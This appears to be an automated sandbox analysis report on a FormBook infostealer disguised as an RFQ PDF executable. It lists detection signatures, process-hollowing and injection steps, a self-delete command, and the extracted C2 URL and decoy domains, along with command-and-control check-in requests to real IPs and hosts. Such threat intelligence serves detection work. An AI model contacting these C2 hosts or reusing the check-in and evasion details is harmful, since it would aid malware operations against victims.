Windows Analysis Report
RFQ PC25-1301 Product Specifications_PDF.exe

Overview

General Information

Sample name: RFQ PC25-1301 Product Specifications_PDF.exe
Analysis ID: 1589987
MD5: f1cb41be3365b899a74d919df902fc08
SHA1: befff58e08b3adc2058f51c884067e59708e17d3
SHA256: d59aedcde68dc8275a3ad53be28c1588790b2e5da2258a66d4492c5a7c67a7c1
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RFQ PC25-1301 Product Specifications_PDF.exe (PID: 2940 cmdline: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe" MD5: F1CB41BE3365B899A74D919DF902FC08)
    • svchost.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autoconv.exe (PID: 4816 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)
        • help.exe (PID: 5132 cmdline: "C:\Windows\SysWOW64\help.exe" MD5: DD40774E56D4C44B81F2DFA059285E75)
          • cmd.exe (PID: 2016 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}
      Source | Rule | Description | Author | Strings
      00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          Source | Rule | Description | Author | Strings
          0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group

          System Summary

          Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", CommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", CommandLine|base64offset|contains: <-], Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", ParentImage: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe, ParentProcessId: 2940, ParentProcessName: RFQ PC25-1301 Product Specifications_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", ProcessId: 6444, ProcessName: svchost.exe
          Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", CommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", CommandLine|base64offset|contains: <-], Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", ParentImage: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe, ParentProcessId: 2940, ParentProcessName: RFQ PC25-1301 Product Specifications_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", ProcessId: 6444, ProcessName: svchost.exe
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2025-01-13T13:06:02.674559+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49738 | 164.92.166.75 | 80 | TCP
          2025-01-13T13:06:22.815300+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49751 | 172.104.236.215 | 80 | TCP
          2025-01-13T13:06:42.498046+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49752 | 104.21.40.196 | 80 | TCP
          2025-01-13T13:07:24.284359+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49753 | 217.21.91.24 | 80 | TCP
          2025-01-13T13:08:05.002852+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49755 | 104.21.80.156 | 80 | TCP
          2025-01-13T13:08:46.057105+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49756 | 104.18.188.223 | 80 | TCP
          2025-01-13T13:09:28.139155+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49757 | 23.225.71.166 | 80 | TCP

          AV Detection

          Source: RFQ PC25-1301 Product Specifications_PDF.exe, Avira: detected
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, ReversingLabs: Detection: 36%
          Source: Yara match, File source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, Joe Sandbox ML: detected
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332742622.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2334998712.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337730554.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334619493.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.2399183500.000000000316A000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000003.2400905474.0000000003317000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.000000000365E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332742622.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2334998712.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2399691163.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337730554.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334619493.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, help.exe, help.exe, 00000005.00000002.4770864197.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.2399183500.000000000316A000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000003.2400905474.0000000003317000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.000000000365E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: help.pdbGCTL source: svchost.exe, 00000002.00000002.2399341941.00000000029C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.2399474583.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399509273.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4769749796.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4782465999.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003A0F000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4770053790.0000000002F61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: help.pdb source: svchost.exe, 00000002.00000002.2399341941.00000000029C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.2399474583.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399509273.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4769749796.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4782465999.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003A0F000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4770053790.0000000002F61000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A7C2A2 FindFirstFileExW,0_2_00A7C2A2
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB68EE FindFirstFileW,FindClose,0_2_00AB68EE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00AB698F
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AAD076
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AAD3A9
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AB9642
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AB979D
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AADBBE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00AB9B2B
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00AB5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi2_2_00417D7F
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi5_2_02CC7D7F

          Networking

          Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49753 -> 217.21.91.24:80
          Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49753 -> 217.21.91.24:80
          Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49738 -> 164.92.166.75:80
          Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49753 -> 217.21.91.24:80
          Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49738 -> 164.92.166.75:80
          Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49738 -> 164.92.166.75:80
          Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49751 -> 172.104.236.215:80
          Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49755 -> 104.21.80.156:80
          Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49751 -> 172.104.236.215:80
          Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49751 -> 172.104.236.215:80
          Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49755 -> 104.21.80.156:80
          Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49755 -> 104.21.80.156:80
          Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49757 -> 23.225.71.166:80
          Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49757 -> 23.225.71.166:80
          Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49757 -> 23.225.71.166:80
          Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49752 -> 104.21.40.196:80
          Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49752 -> 104.21.40.196:80
          Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49752 -> 104.21.40.196:80
          Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49756 -> 104.18.188.223:80
          Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49756 -> 104.18.188.223:80
          Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49756 -> 104.18.188.223:80
          Source: C:\Windows\explorer.exe, Network Connect: 164.92.166.75 80
          Source: C:\Windows\explorer.exe, Network Connect: 172.104.236.215 80
          Source: Malware configuration extractor, URLs: www.7b5846.online/hwu6/
          Source: DNS query: www.maheshg.xyz
          Source: DNS query: www.86339.xyz
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=VqwCA0fDirS9FNcK+XWY5HArCimG0sfrxcJclabbIM4+tzWzOeCWxbUPg8n3aCtVsQmTH2yodQ==&Ez=ltxdQ8m HTTP/1.1Host: www.simo1simo001.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=mpYjKcP0TN+fbEitUHIdgmI2VRYct5ttq2KUkf3p2L9OArgqjWS4GwM5LnRr9sxMQhRrBRaxzw==&Ez=ltxdQ8m HTTP/1.1Host: www.ilsgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=YeF1y3E0QpZaaHwaKvJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd2HkwQuXQqI9c12LSg==&Ez=ltxdQ8m HTTP/1.1Host: www.7b5846.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=FXfZ1xOYYW9swHejpVIfMDCztZ/FrnQZeJUgNQ4rzoTHCxvijkBbGX2//Z/tWIGDAo4gMXnXlg==&Ez=ltxdQ8m HTTP/1.1Host: www.maheshg.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=+zwICv/sB1e6MtWwpRel8f5Q0bYKICZzsoJO8W/+cdiLpY7N+AEBhZIv3jjSTSPlRhhnl/FLAA==&Ez=ltxdQ8m HTTP/1.1Host: www.gequiltdesins.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 104.21.40.196
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
          Source: Joe Sandbox View, ASN Name: ASN-DPSDUS
          Source: Joe Sandbox View, ASN Name: LINODE-APLinodeLLCUS
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ABCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00ABCE44
          Source: global traffic, DNS traffic detected: DNS query: www.simo1simo001.click
          Source: global traffic, DNS traffic detected: DNS query: www.ilsgroup.net
          Source: global traffic, DNS traffic detected: DNS query: www.7b5846.online
          Source: global traffic, DNS traffic detected: DNS query: www.91uvq.pro
          Source: global traffic, DNS traffic detected: DNS query: www.maheshg.xyz
          Source: global traffic, DNS traffic detected: DNS query: www.hair-transplantation-65829.bond
          Source: global traffic, DNS traffic detected: DNS query: www.gequiltdesins.shop
          Source: global traffic, DNS traffic detected: DNS query: www.backstretch.store
          Source: global traffic, DNS traffic detected: DNS query: www.health-insurance-cake.world
          Source: global traffic, DNS traffic detected: DNS query: www.86339.xyz
          Source: global traffic, DNS traffic detected: DNS query: www.d66dr114gl.bond
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000002.4775355459.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4775380521.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770959078.00000000028A0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/www.91uvq.pro
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.onlineReferer:
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.86339.xyz
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.86339.xyz/hwu6/
          Source: explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.86339.xyz/hwu6/www.d66dr114gl.bond
